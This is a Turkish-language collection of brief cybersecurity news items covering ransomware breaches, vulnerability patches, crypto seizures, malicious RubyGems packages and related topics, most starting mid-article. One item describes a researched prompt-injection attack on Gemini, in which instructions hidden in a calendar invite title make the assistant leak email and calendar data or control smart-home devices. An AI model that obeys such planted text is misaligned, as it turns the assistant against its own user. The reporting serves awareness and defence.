Inotiv, olayın ardından harici siber güvenlik uzmanlarıyla birlikte soruşturma başlattı ve kolluk kuvvetlerini bilgilendirdi. Şirketin IT ekibi, etkilenen sistemleri yeniden işler hale getirmek için çalışmalar yürütüyor. Bazı iş süreçleri ise çevrimdışı alternatiflere taşınarak kesintilerin etkisi azaltılmaya çalışılıyor.

Şirket, saldırının veritabanları ve iş süreçlerinde kullanılan bazı iç uygulamaları etkilediğini, bu nedenle operasyonlarda aksaklıkların bir süre daha devam etmesini beklediklerini duyurdu. Normal işleyişe dönüş için net bir tarih verilmedi.

Inotiv hakkında
Yaklaşık 2.000 kişiyi istihdam eden ve yıllık 500 milyon dolardan fazla gelir elde eden Inotiv, ilaç keşfi, geliştirilmesi, güvenlik değerlendirmesi ve canlı hayvan araştırma modelleri konularında uzmanlaşmış bir sözleşmeli araştırma kuruluşu olarak faaliyet gösteriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İddialar
AshES Cybersecurity, Elastic Defend’in elastic-endpoint-driver.sys adlı sürücüsünde NULL pointer dereference hatası bulunduğunu, bunun da EDR korumasını atlatmaya, uzaktan kod yürütmeye ve kalıcılık sağlamaya yol açabileceğini öne sürdü. Araştırmacı, kendi hazırladığı sürücü ile bu hatayı tetiklediğini, Windows’un çökmesini ve calc.exe dosyasının EDR tarafından engellenmeden açılmasını gösteren iki video yayımladı.

Elastic’in yanıtı
Elastic Güvenlik Mühendisliği ekibi, iddiaları inceleyerek rapor edilen açığın yeniden üretilemediğini belirtti. Şirket, AshES tarafından gönderilen raporların tekrarlanabilir bir sömürü kanıtı içermediğini ve araştırmacının PoC paylaşmayı reddettiğini duyurdu.

Elastic açıklamasında, güvenlik araştırmalarında koordineli açıklamanın esas olduğunu, ancak bu raporda sürecin takip edilmediğini vurguladı. Şirket, 2017’den bu yana hata ödül programı kapsamında güvenlik araştırmacılarına 600.000 dolardan fazla ödeme yapıldığını hatırlattı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Okta, Auth0 kullanıcılarının güvenlik tehditlerini daha hızlı tespit edebilmesi için Sigma tabanlı kurallardan oluşan açık kaynaklı bir “Customer Detection Catalog” yayımladı. Yeni kurallar seti, şüpheli etkinliklerin log kayıtları üzerinden daha kolay analiz edilmesini sağlayarak hesap ele geçirme ve yapılandırma hataları gibi risklere karşı koruma sunuyor.

Yeni katalog neler içeriyor
Auth0, dünya genelinde birçok kurum tarafından kimlik doğrulama ve kullanıcı yönetimi amacıyla kullanılan bir platform. Daha önce kullanıcıların şüpheli aktiviteleri tespit etmek için kendi kurallarını yazmaları gerekiyordu. Okta’nın yayımladığı katalog ise, topluluk katkısına açık şekilde sürekli güncellenen hazır sorgular sunuyor.

Şirketin açıklamasına göre bu kurallar, anormal kullanıcı davranışlarını, potansiyel hesap ele geçirmelerini, hatalı yapılandırmaları ve sahte yönetici hesaplarının oluşturulmasını ortaya çıkarabiliyor. Ayrıca SMS bombardımanı ve token hırsızlığı gibi saldırı yöntemlerinin log kayıtları üzerinden izlenmesine de imkan tanıyor.

Kullanım süreci
Kullanıcılar, kurallara GitHub üzerinden erişebiliyor. Sigma uyumlu sorgular, sigma-cli gibi dönüştürücüler aracılığıyla farklı SIEM veya log analiz sistemlerine uyarlanabiliyor. Kurallar önce geçmiş loglar üzerinde test edilerek yanlış pozitif sonuçlar ayıklanabiliyor, ardından canlı ortama aktarılabiliyor.

Okta, kullanıcıların kendi geliştirdikleri kuralları da GitHub deposuna “pull request” yoluyla ekleyebileceğini, böylece topluluk temelli bir güvenlik katmanı oluşturulacağını belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Saldırı yöntemi nasıl işliyor
PyPI üzerindeki proje geliştiricilerinin hesapları, e-posta adresleriyle bağlantılı olarak çalışıyor. Bazı adresler özel alan adlarına bağlı olduğunda, bu alan adı süresi dolduğunda saldırganlar aynı alan adını yeniden kaydedebiliyor. Sonrasında bir e-posta sunucusu kurarak parola sıfırlama talebinde bulunabiliyor ve ilgili PyPI hesabının kontrolünü ele geçirebiliyor.

Bu tür saldırılar tedarik zinciri riski yaratıyor. Ele geçirilen hesaplarla popüler Python paketlerinin kötü amaçlı sürümleri yayımlanabiliyor ve bu paketler pip üzerinden otomatik yüklenebiliyor. Daha önce Mayıs 2022’de “ctx” paketine yapılan saldırıda saldırganlar Amazon AWS anahtarlarını hedef alan kötü amaçlı kod eklemişti.

Yeni koruma sistemi
PyPI, alan adlarının yaşam döngüsünü (aktif, ek süre, kurtarma süresi, silinme beklemede) Domainr’ın Status API servisini kullanarak kontrol ediyor. Alan adı süresi dolmuş veya sona erme aşamasına girmişse, bu e-posta adresleri doğrulamasını kaybediyor ve parola sıfırlama ya da hesap kurtarma işlemlerinde kullanılamıyor.

Yeni sistemin geliştirilmesi Nisan 2025’te başladı ve Haziran 2025’te günlük taramalarla devreye alındı. O tarihten bu yana 1.800’den fazla e-posta adresi bu kapsamda geçersiz sayıldı.

Kullanıcılara öneriler
PyPI, kullanıcıların hesaplarına özel alan adı yerine genel e-posta servislerinden yedek bir adres eklemelerini ve hesap güvenliği için iki faktörlü kimlik doğrulama kullanmalarını öneriyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Siber suçlarla bağlantılı kripto paraların izlenmesi ve engellenmesine yönelik iki farklı girişim kapsamında, 300 milyon dolardan fazla değerde dijital varlık donduruldu. Çalışmalar, uluslararası kolluk kuvvetleri ile özel sektör iş birliğinde yürütüldü.

T3 FCU girişimi
TRM Labs, TRON ve Tether tarafından 2024 yılında başlatılan T3 Finansal Suç Birimi (T3 FCU), bugüne kadar 250 milyon doların üzerinde suç gelirini dondurdu. Binance’in ilk resmi üye olarak katıldığı girişimde, milyonlarca işlem analiz edilerek kara para aklama, yatırım dolandırıcılığı, terör finansmanı ve fidye yazılımları gibi vakalarla ilgili soruşturmalara destek sağlandı.

TRM Labs tarafından yapılan açıklamada, Eylül 2024’ten bu yana beş kıtada 3 milyar doların üzerinde işlem hacminin izlendiği, bu kapsamda özellikle “romantik tuzak” adı verilen dolandırıcılık yöntemlerine yönelik 6 milyon doların dondurulduğu belirtildi.

Kanada ve ABD merkezli operasyonlar
Diğer girişim ise ABD ve Kanada’nın yürüttüğü, Chainalysis uzmanlarının destek verdiği operasyonlarla gerçekleşti. Ontario Eyalet Polisi tarafından yürütülen “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu tarafından yönetilen “Operation Avalanche” kapsamında, son altı ayda 74,3 milyon dolarlık kayıp tespit edildi.

Chainalysis verilerine göre, bu operasyonlar kapsamında 14 farklı ülkede 2.000’den fazla kripto cüzdan adresi belirlendi. Tether ile yapılan iş birliği sayesinde 50 milyon dolardan fazla USDT kara listeye alındı ve suçluların bu varlıkları nakde çevirmesi engellendi.

Uzmanlara göre, bu tür küresel iş birlikleri, siber suçların finansman kaynaklarını kurutma ve suç gelirlerinin dolaşımını blockchain üzerinde doğrudan engelleme açısından kritik önem taşıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Hangi sürümler etkileniyor
Cisco’ya göre açık, FMC yazılımının 7.0.7 ve 7.7.0 sürümlerinde, RADIUS kimlik doğrulaması aktifken ortaya çıkıyor. Bu, özellikle kurumsal ve devlet ağlarında merkezi kimlik doğrulama için sık kullanılan bir konfigürasyon.

Güncellemeler yayımlandı
Cisco, güvenlik açığını gidermek için ücretsiz yazılım güncellemelerini yayımladı. Yama, geçerli hizmet sözleşmesine sahip müşteriler için standart kanallar üzerinden erişilebilir durumda.

Geçici çözüm seçeneği
Yama yüklenemeyen ortamlarda önerilen tek geçici çözüm, RADIUS kimlik doğrulamasını devre dışı bırakarak yerine yerel kullanıcı hesapları, LDAP ya da SAML tabanlı kimlik doğrulama yöntemlerinin kullanılması.

Henüz istismar edilmedi
Açık, Cisco güvenlik araştırmacısı Brandon Sakai tarafından dahili testlerde keşfedildi. Şirket, açığın sahada istismar edildiğine dair herhangi bir bulguya sahip olmadığını açıkladı.

Ek güvenlik yamaları
Cisco ayrıca Snort 3, ASA, FTD, IOS ve IOS XE gibi ürünlerde hizmet reddi (DoS) ve HTML enjeksiyonu gibi 13 yüksek önem dereceli güvenlik açığını da kapattı. Bu açıkların hiçbirinin aktif olarak istismar edildiği raporlanmadı.

beykoz haber

Kaynak: CUMHA - CUMHUR HABER AJANSI

145 bin kişi bilgilendirildi
Maine Başsavcılığı’na yapılan bildirimde, 144.189 kişinin verilerinin saldırıdan etkilendiği belirtildi. Çalınan veriler arasında kimlik bilgileri, pasaport taramaları, sosyal güvenlik numaraları, adresler, iletişim bilgileri ve test sonuçları yer alabileceği aktarıldı.

RansomHub saldırıyı üstlendi
RansomHub fidye yazılımı grubu, Ocak 2025’te saldırıyı üstlendiğini açıkladı. Grup, Manpower’ın sistemlerinden yaklaşık 500 GB veri çaldığını ve bunun içinde yıllara ait yazışmalar, mali tablolar, insan kaynakları verileri, gizli sözleşmeler ve NDA’ların bulunduğunu iddia etti. Daha sonra verilerin sızdırılacağına dair paylaşımlar grubun sızdırma sitesinden kaldırıldı, bu da fidyenin ödenmiş olabileceği ihtimalini gündeme getirdi.

Şirketten açıklama
ManpowerGroup sözcüsü, olayın yalnızca bağımsız bir franchise şubesini etkilediğini, şirketin kurumsal ağının saldırıdan etkilenmediğini vurguladı. Şirket, FBI ile iş birliği yaptığını ve etkilenen kişilere Equifax üzerinden ücretsiz kredi izleme ve kimlik hırsızlığına karşı koruma hizmeti sunduğunu açıkladı.

RansomHub’ın geçmişi
RansomHub, daha önce Halliburton, Rite Aid, Kawasaki, Christie's, Frontier Communications ve Planned Parenthood gibi kurumları da hedef aldı. Grup ayrıca Change Healthcare saldırısında 190 milyondan fazla kişinin etkilendiği verileri sızdırmıştı. FBI, Ağustos 2024 itibarıyla grubun 200’den fazla kritik altyapı kuruluşunu hedef aldığını bildirmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

3,3 milyon dolarlık zarar
Sanığın, 8,4 milyon dolarlık sahte vergi iadesi başvurusu yaparak yaklaşık 2,5 milyon dolar elde ettiği, ayrıca sahte SBA kredi başvurularıyla 819 bin dolar çaldığı belirtildi. Toplam zarar 3,3 milyon doları aştı.

Sahte yatırım planı da yürüttü
Savcılığa göre Amachukwu, aynı dönemde sahte yatırım teklifleriyle de mağdurları kandırdı. “Standby letter of credit” gibi gerçekte var olmayan finansal araçları satarak milyonlarca doları kendi hesabına aktardı.

Fransa’dan iade edildi
Amachukwu, 4 Ağustos 2025’te Fransa’dan ABD’ye iade edildi ve ertesi gün New York Güney Bölgesi’nde hâkim karşısına çıkarıldı. Henüz duruşma tarihi belirlenmedi.

Ciddi cezalarla karşı karşıya
Sanık hakkında bilgisayar korsanlığına teşebbüs (5 yıl), iki kez kablolu dolandırıcılık (her biri 20 yıl), iki kez kablolu dolandırıcılığa teşebbüs (her biri 20 yıl) ve ağırlaştırılmış kimlik hırsızlığı (zorunlu 2 yıl ek ceza) suçlamaları bulunuyor. Ayrıca elde ettiği tüm malvarlıklarına el konulması talep ediliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

T3+ programı ile 250 milyon dolar donduruldu
Eylül 2024’te kurulan T3 Financial Crime Unit, bugüne kadar dünya genelinde 250 milyon dolarlık suç gelirini dondurdu. Bu girişim, TRM Labs, Tether ve TRON tarafından başlatıldı, Binance ise resmi katılımcı oldu. Çalışmalar kapsamında kara para aklama, yatırım dolandırıcılığı, şantaj ve terör finansmanı gibi suçlara yönelik binlerce işlem incelendi.

Öne çıkan vakalardan birinde, Binance iş birliğiyle “romance scam” saldırılarında elde edilen 6 milyon dolarlık kripto varlık donduruldu.

Kanada-ABD iş birliğiyle 74 milyon dolar engellendi
Kanada Ontario Eyalet Polisi’nin yönettiği “Project Atlas” ve Britanya Kolumbiyası Menkul Kıymetler Komisyonu’nun yürüttüğü “Operation Avalanche”, Chainalysis analitiğiyle desteklendi.

Son altı ayda 74,3 milyon dolarlık dolandırıcılık gelirine ulaşıldı ve büyük kısmı donduruldu. Tether iş birliğiyle 50 milyon dolarlık USDT kara listeye alındı.

Küresel etki
Project Atlas, 14 ülkede 2.000’den fazla kripto cüzdan adresini mağdurlarla ilişkilendirdi. Kanada, ABD, Almanya, Avustralya ve Birleşik Krallık mağdurlar arasında yer aldı.

Yöntem: blockchain seviyesinde müdahale
Her iki girişimde de koordineli operasyonlar ve blockchain düzeyinde doğrudan müdahalelerle suç gelirlerinin transfer edilmesi veya nakde çevrilmesi engellendi. Uzmanlar, bu modelin siber suçluların hareket alanını daraltmada kritik bir adım olduğunu belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Garantex’in kapatılmasının ardından Grinex devreye alındı
ABD Gizli Servisi’nin Mart 2025’te Garantex’in alan adlarına el koymasının ardından şirket yöneticilerinin müşteri varlıklarını Grinex’e aktardığı tespit edildi. ABD Hazine Bakanlığı Yabancı Varlıklar Kontrol Ofisi (OFAC), dün itibarıyla Grinex’i yaptırım listesine ekledi.

Yaptırımları aşmak için kuruldu
OFAC açıklamasında, Grinex’in tanıtım materyallerinde borsanın, Garantex’e yönelik yaptırımlar ve varlık dondurmaları sonrası kurulduğunun açıkça ifade edildiği vurgulandı. Grinex’in kuruluşundan bu yana milyarlarca dolarlık kripto para transferine aracılık ettiği belirtildi.

Garantex ve ortaklarına yeni yaptırımlar
OFAC ayrıca Garantex, üç kurucusu (Sergey Mendeleev, Aleksandr Mira Serda, Pavel Karavatsky) ve Rusya ile Kırgızistan’daki altı iş ortağı şirkete (InDeFi Bank, Exved, Old Vector, A7, A71, A7 Agent) yönelik yaptırımları da yeniledi.

Ödül çağrısı
ABD Dışişleri Bakanlığı, Garantex yöneticilerinin yakalanması veya mahkumiyetine yol açacak bilgiler için 6 milyon dolara kadar ödül teklif etti.

Geçmiş bağlantılar
Garantex, Hydra dark web pazarı ve Conti, Black Basta, LockBit, NetWalker, Ryuk, Phoenix Cryptolocker gibi fidye yazılımı gruplarıyla bağlantıları nedeniyle Nisan 2022’de yaptırım listesine alınmıştı. Bakanlığa göre Garantex, Nisan 2019–Mart 2025 arasında 96 milyar dolardan fazla kripto işlemine aracılık etti.

ABD’den mesaj
Hazine Bakanlığı Terörizm ve Mali İstihbarat Müsteşarı John K. Hurley, “Kripto borsalarını kara para aklama ve fidye yazılımlarına destek için kullanmak ulusal güvenliğimizi tehdit ediyor. Bu aktörleri ortaya çıkararak dijital varlık sektörünün bütünlüğünü korumaya kararlıyız” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açık bug bounty ile bildirildi
Plex, hatayı hata ödül programı aracılığıyla öğrendiğini ve hızlıca gidererek yeni sürümü yayımladığını açıkladı. Güvenlik açığına ilişkin CVE kimliği henüz atanmamış olsa da, şirket 1.41.7.x–1.42.0.x sürümlerini çalıştıran tüm sunucuların risk altında olduğunu belirtti.

Yamalanan sürüm
Güvenlik açığını kapatan sürüm Plex Media Server 1.42.1.10060 olarak yayımlandı. Kullanıcılar, sunucu yönetim paneli veya resmi indirme sayfası üzerinden bu sürüme geçiş yapabiliyor.

Acil güncelleme çağrısı
Plex, etkilenen kullanıcılara gönderdiği e-postalarda, sistemlerinin eski sürüm çalıştırdığını belirterek “en kısa sürede güncelleme yapın” uyarısında bulundu. Şirket, saldırganların yamaları analiz ederek istismar geliştirmesinden önce önlem alınması gerektiğini vurguladı.

Plex geçmişte de hedef olmuştu
Mart 2023’te CISA, Plex Media Server’daki üç yıllık bir RCE açığını (CVE-2020-5741) “aktif istismar edilen” açıklar listesine almıştı. Bu zafiyetin, LastPass’in 2022’de yaşadığı büyük veri sızıntısıyla bağlantılı olabileceği düşünülüyor. Aynı yıl Plex de kullanıcı veritabanına sızıldığını ve şifrelerin sıfırlanması gerektiğini duyurmuştu.

Kullanıcılar için öneriler

• Plex Media Server’ınızı 1.42.1.10060 sürümüne güncelleyin.

• Güncellemeleri düzenli takip edin.

• Sunucunuzu internet üzerinden erişime açık bırakmamaya özen gösterin.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kesinti dördüncü gününde sürüyor
Colt Telecom, 12 Ağustos’ta başlayan saldırının ardından destek hizmetlerine ait bazı sistemleri koruma amaçlı çevrim dışı bıraktı. Bu durum, müşteri iletişim platformlarını etkilerken yanıt sürelerinde gecikmelere yol açtı. Şirket, ana ağ altyapısının saldırıdan etkilenmediğini vurguladı.

WarLock grubu verileri satışa çıkardı
‘cnkjasdfgd’ takma adlı bir tehdit aktörü, kendisini WarLock fidye yazılımı grubunun üyesi olarak tanıtarak saldırıyı üstlendi. Hacker, şirketten çaldığı bir milyon belgeyi 200 bin dolar karşılığında satışa çıkardı ve içeriğin doğruluğunu göstermek için örnekler paylaştı. Belgeler arasında mali veriler, müşteri ve çalışan kayıtları, iç yazışmalar ve yazılım geliştirme dokümanları olduğu öne sürüldü.

Microsoft SharePoint açığına işaret ediliyor
Siber güvenlik uzmanı Kevin Beaumont, saldırının Microsoft SharePoint’teki CVE-2025-53770 açığı üzerinden gerçekleştirilmiş olabileceğini belirtti. Bu sıfır gün açığı 18 Temmuz’dan itibaren istismar edilmiş, Microsoft ise 21 Temmuz’da güvenlik güncellemesi yayımlamıştı.

Şirketten açıklama
Colt, saldırıyı doğrularken çalındığı iddia edilen veriler hakkında yorum yapmadı. Şirket sözcüsü, “Siber olaya ilişkin iddiaların farkındayız. İç sistemlerimizi yeniden çalışır hale getirmek için üçüncü taraf uzmanlarla birlikte çalışıyoruz” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Yeni güvenlik katmanları geliyor
Microsoft 365 yol haritasında yer alan güncellemeye göre Teams, sohbet ve kanallarda çalıştırılabilir dosya türlerini (örn. .exe) engelleyerek dosya tabanlı saldırılara karşı koruma sağlayacak. Ayrıca gönderilen kötü amaçlı bağlantılar otomatik olarak tespit edilip kullanıcıya uyarı verilecek.

Defender entegrasyonu
Microsoft, Teams’in artık Defender for Office 365 Tenant Allow/Block List ile entegre olduğunu duyurdu. Bu sayede güvenlik yöneticileri engellenmiş alan adlarından gelen sohbet, kanal, toplantı ve çağrıları bloke edebilecek. Hatta bu alan adlarından gelen geçmiş iletişimler de otomatik olarak silinebilecek. Özellik Eylül 2025 sonunda genel kullanıma açılacak.

Daha önce gelen güvenlik adımları

• Temmuz 2025: Ekran görüntüsü engelleme özelliği devreye alındı. Toplantılarda kullanıcı ekran görüntüsü almaya çalıştığında pencere siyaha düşerek bilgi sızıntısı önleniyor.

• Şubat 2025: Sohbetlerde marka taklitlerine karşı kimlik avı koruması tüm müşterilere sunuldu.

• Enterprise Connect 2024: Microsoft, Teams’in 320 milyon aylık aktif kullanıcıya ulaştığını açıkladı.

Kullanıma sunulma takvimi
Yeni URL ve dosya engelleme özelliklerinin Eylül 2025’ten itibaren dünya çapında kademeli olarak devreye alınması planlanıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açığın teknik detayları
Araştırmacı Aviv Y’nin “FortMajeure” adını verdiği açık, FortiWeb’in çerez ayrıştırma sürecindeki “Era” parametresinden kaynaklanıyor. Bu parametre beklenmedik bir değer aldığında, sunucu tüm sıfırlardan oluşan gizli anahtar kullanıyor. Sonuç olarak, sahte çerezler kolayca oluşturulabiliyor ve kimlik doğrulama tamamen atlatılabiliyor.

Nasıl istismar ediliyor
CVE-2025-52970’nin sömürülmesi için hedef kullanıcının aktif oturumunun bulunması gerekiyor. Saldırgan, çerezdeki küçük bir sayısal alanı tahmin etmek zorunda, ancak bu değer genellikle 30’un altında olduğundan brute force işlemi yalnızca birkaç denemeyle tamamlanabiliyor.

Etkilenen sürümler ve yamalar
Zafiyet FortiWeb 7.0–7.6 arasındaki sürümleri etkiliyor. Fortinet, aşağıdaki sürümlerde açığı kapattığını duyurdu:

• 7.6.4 ve sonrası

• 7.4.8 ve sonrası

• 7.2.11 ve sonrası

• 7.0.11 ve sonrası

FortiWeb 8.0 sürümlerinin etkilenmediği açıklandı.

Araştırmacının yaklaşımı
Aviv Y, REST uç noktası üzerinden admin taklidi gösteren bir PoC çıktısı paylaştı, ancak CLI’ye bağlanmayı da içeren tam istismar kodunu daha sonra yayımlayacağını belirtti. Amaç, saldırganlardan önce savunuculara sistemlerini yamalama süresi tanımak.

Yama dışında çözüm yok
Fortinet’in güvenlik bülteninde herhangi bir geçici çözüm sunulmadı. Bu nedenle güvenli sürümlere güncelleme yapmak tek etkili adım olarak gösteriliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ransomware gelirleri takip edildi
Antropenko’nun, Zeppelin fidye yazılımı saldırılarıyla elde ettiği fidye ödemelerini aklamak için ChipMixer gibi kripto para karıştırma hizmetlerini, nakit dönüşüm işlemlerini ve parçalara bölünmüş banka yatırımlarını kullandığı tespit edildi. ChipMixer, Mart 2023’te yetkililer tarafından kapatılmıştı.

Zeppelin’in geçmişi
2019 sonunda VegaLocker/Buran fidye yazılımının bir türevi olarak ortaya çıkan Zeppelin, özellikle sağlık ve bilişim firmalarını hedef aldı. 2021’de güncellenmiş sürümlerle yeniden ortaya çıksa da kullanılan şifreleme yöntemlerinin zayıflığı dikkat çekmişti.

Kasım 2022’de operasyon büyük ölçüde sona erdi. Daha sonra güvenlik araştırmacılarının 2020’den bu yana ücretsiz dosya kurtarma anahtarına sahip olduğu ortaya çıktı. Ocak 2024’te ise Zeppelin kaynak kodunun bir hacker forumunda yalnızca 500 dolara satıldığı bildirildi.

Fidye ödemelerine el konuldu
Ele geçirilen 2,8 milyon doların fidye gelirlerinden kaynaklandığı belirtiliyor. ABD yetkilileri geçtiğimiz haftalarda da BlackSuit grubundan 1 milyon dolar, Chaos grubundan ise 2,4 milyon dolar değerinde Bitcoin’e el koymuştu.

Uzmanlara göre kritik adım
Yetkililer, bu tür el koyma operasyonlarının, siber suçluların yakalanamadığı durumlarda bile fidye gelirlerini kullanarak yeniden yapılanmalarını veya yeni üyeler kazanmalarını engellemede kritik rol oynadığını vurguladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sahte otomasyon araçlarıyla yayılım
Ruby programlama dilinin resmi paket yöneticisi RubyGems.org üzerinde, farklı takma adlar kullanan saldırganlar tarafından yayımlanan zararlı kütüphaneler, özellikle Güney Koreli kullanıcıları hedef aldı. Paketler, WordPress, Telegram, Naver Café, SEO araçları ve blog platformlarına yönelik otomasyon yazılımları gibi tanıtıldı.

Gerçekte kimlik avı aracı
Kütüphaneler kurulduğunda meşru görünümlü bir arayüz sunuyor, ancak kullanıcı giriş bilgilerini doğrudan saldırganların kontrolündeki alan adlarına (programzon[.]com, appspace[.]kr, marketingduo[.]co[.]kr) iletiyordu. Çalınan veriler arasında kullanıcı adı, şifre (düz metin), cihaz MAC adresi ve paket adı bulunuyor.

Karanlık ağda satışa çıktı
Araştırmacılar, elde edilen bilgilerin Rusça konuşulan dark web pazarlarında satışa çıkarıldığını tespit etti. Kimlik bilgisi günlüklerinin saldırganların kontrol ettiği marketingduo[.]co[.]kr ile bağlantılı olduğu belirlendi.

16 paket hâlâ yayında
Socket, tüm zararlı paketleri RubyGems ekibine bildirdiğini, ancak en az 16’sının hâlâ indirilebilir olduğunu açıkladı. Bu durum, açık kaynak yazılım depolarına yönelik tedarik zinciri saldırılarının süregelen bir tehdit olduğunu gösteriyor.

Geliştiricilere uyarı
Uzmanlar, kütüphaneleri indirirken yayıncının geçmişini ve paketlerin şüpheli kod içerip içermediğini kontrol etmeyi, bağımlılıkları güvenli sürümlere kilitlemeyi ve obfuscation (gizlenmiş) kod parçaları içeren paketlere karşı dikkatli olunması gerektiğini vurguluyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İhlal potansiyel müşterileri etkiledi
Google’ın yaptığı bildirimde, Salesforce üzerinden potansiyel Ads müşterileriyle iletişimde kullanılan verilerin yetkisiz kişilerce erişildiği belirtildi. Etkilenen veriler arasında şirket adları, telefon numaraları ve satış temsilcilerinin notları yer aldı. Ads hesapları, Merchant Center, Analytics ve diğer ürünlerdeki müşteri verilerinin etkilenmediği vurgulandı.

ShinyHunters saldırının arkasında
Saldırının, son aylarda Salesforce müşterilerini hedef alan ShinyHunters grubuyla bağlantılı olduğu doğrulandı. Grup, ele geçirilen verilerin yaklaşık 2,55 milyon kayıttan oluştuğunu iddia etti. Kayıtların arasında mükerrer girişler olabileceği belirtildi.

Scattered Spider ile iş birliği
ShinyHunters, saldırılarda ilk erişimi sağlayan Scattered Spider ile ortak hareket ettiklerini ve birlikte “Sp1d3rHunters” adı altında çalıştıklarını açıkladı. Grup, çalışanlara yönelik sosyal mühendislik saldırılarıyla kimlik bilgisi elde edip, Salesforce ortamlarına kötü amaçlı OAuth uygulamaları bağlatarak tüm veritabanlarını indirdiklerini bildirdi.

Fidye talebi ve yeni araçlar
ShinyHunters, Google’dan 20 Bitcoin (yaklaşık 2,3 milyon dolar) talep ettiklerini, ancak bu talebi “ciddi olmayan” bir hamle olarak nitelendirdiklerini söyledi. Grup ayrıca, artık Salesforce Data Loader yerine kendi geliştirdikleri Python tabanlı araçları kullandıklarını açıkladı.

Google’dan açıklama
Google, Haziran 2025’te bu saldırı yöntemlerine dikkat çekmişti. Şirket, saldırıyı doğrularken kullanıcıların Ads hesaplarının güvende olduğunu yineledi. Ayrıca, yeni araçlarla yapılan saldırıları gözlemlediklerini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Kritik açık Calendar üzerinden tetiklendi
Gemini, Gmail, Calendar ve Google Home gibi hizmetlere entegre çalışıyor. Açık, saldırganın Google Calendar davetinde etkinlik başlığına zararlı bir “prompt injection” gizlemesiyle tetikleniyordu. Kullanıcı Gemini’ye “Bugün takvimimde ne var” gibi rutin bir soru yönelttiğinde, asistan ilgili başlıkları okuyor ve zararlı komutu da kendi bağlamında yürütüyordu.

Olası saldırı senaryoları
Bu yöntemle saldırganlar:

• Kullanıcının e-posta ve takvim verilerini dışarı aktarabiliyor,

• Akıllı ev cihazlarını uzaktan kontrol edebiliyor,

• Uygulama açabiliyor veya Zoom görüşmesi başlatabiliyor,

• Kullanıcının IP adresini öğrenmek için URL açtırabiliyordu.

Altı davetlik sinsi yöntem
Araştırmacılar, Calendar’da yalnızca son beş etkinliğin doğrudan görüntülendiğini belirledi. Bu nedenle saldırganların görünürlükten kaçınmak için altı davet göndermesi, zararlı prompt’u sonuncuya gizlemesi gerekiyordu. Kullanıcılar bu daveti yalnızca “Daha fazla göster” seçeneğine tıklarsa fark edebiliyordu.

Google açığı kapattı
Google, SafeBreach araştırmacıları Ben Nassi ve ekibinin sorumlu bildirim süreci sayesinde açığın istismar edilmeden kapatıldığını açıkladı. Google Workspace güvenlik ürün yönetimi direktörü Andy Wen, araştırmanın savunma mekanizmalarının geliştirilmesini hızlandırdığını vurguladı.

Daha önce de uyarılar yapılmıştı
Geçen ay Mozilla araştırmacısı Marco Figueroa, Gemini’nin başka bir “prompt injection” tekniğine karşı savunmasız olduğunu ve bunun kimlik avı saldırılarına kapı aralayabileceğini açıklamıştı. Google, yeni koruma önlemlerinin devreye alınmakta olduğunu belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

172 bin kişi etkilendi
27 Temmuz’da tamamlanan incelemede, toplam 172 bin üyenin verilerinin risk altında olduğu tespit edildi. Çalınan bilgiler arasında isimler, hesap numaraları, banka kartı verileri, Sosyal Güvenlik numaraları ve devlet kimlikleri bulunuyor. Şirket, üyelerin hesap bakiyelerine erişildiğine dair bir bulgu olmadığını bildirdi.

Dolandırıcılık riski arttı
Connex, resmi internet sitesine koyduğu uyarıyla üyeleri devam eden oltalama saldırılarına karşı bilgilendirdi. Açıklamada, “Connex hiçbir zaman sizden PIN, şifre veya hesap numarası istemez. Şüpheli bir arama veya mesaj alırsanız telefonu kapatıp doğrudan bizi arayın” denildi.

Geniş çaplı saldırı dalgasının parçası
İhlalin, Salesforce platformlarını hedef alan ShinyHunters grubuyla ilişkilendirilen saldırı dalgasının ardından gelmesi dikkat çekti. Son aylarda Allianz Life, Adidas, Qantas, Louis Vuitton, Dior, Tiffany & Co., Chanel ve Google gibi markalar da benzer saldırılardan etkilenmişti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

29 binden fazla sunucu yamalanmamış
Shadowserver’ın 10 Ağustos tarihli taramalarına göre dünya genelinde 29.098 sunucu halen yamalanmamış durumda. Bunların 7.200’den fazlası ABD’de, 6.700’den fazlası Almanya’da, 2.500’den fazlası ise Rusya’da bulunuyor.

Microsoft ve CISA’dan uyarılar
Microsoft, açığı Nisan 2025’te yayımladığı bir güvenlik danışmanlığı ve hotfix ile duyurdu. Şirket, “kötüye kullanılma ihtimali yüksek” olarak işaretlediği açık için tüm hibrit yapıların yeni mimariye geçirilmesini tavsiye etti.

ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), 25-02 numaralı acil direktifle federal kurumlara 9 Ağustos Pazartesi sabahına kadar yama yapma zorunluluğu getirdi. CISA ayrıca, federal olmayan kurumların da aynı adımları uygulaması gerektiğini vurguladı.

Alınması gereken önlemler

• Microsoft Health Checker script ile ortam taraması,

• EOL sürümlerin internetten ayrılması,

• Exchange 2019 için CU14/15, Exchange 2016 için CU23 yüklenmesi,

• Nisan 2025 hotfix’inin uygulanması.

Uyarı: tam etki alanı ele geçirilebilir
CISA, önlemlerin alınmaması halinde hem hibrit bulut hem de on-premise ortamların tamamen ele geçirilme riskiyle karşı karşıya olduğunu açıkladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Dört üst düzey üye iade edildi
Gana merkezli dolandırıcılık örgütünün yöneticileri olduğu belirtilen Isaac Oduro Boateng (“Kofi Boat”), Inusah Ahmed (“Pascal”), Derrick Van Yeboah (“Van”) ve Patrick Kwame Asare (“Borgar”), 7 Ağustos’ta ABD’ye getirildi.

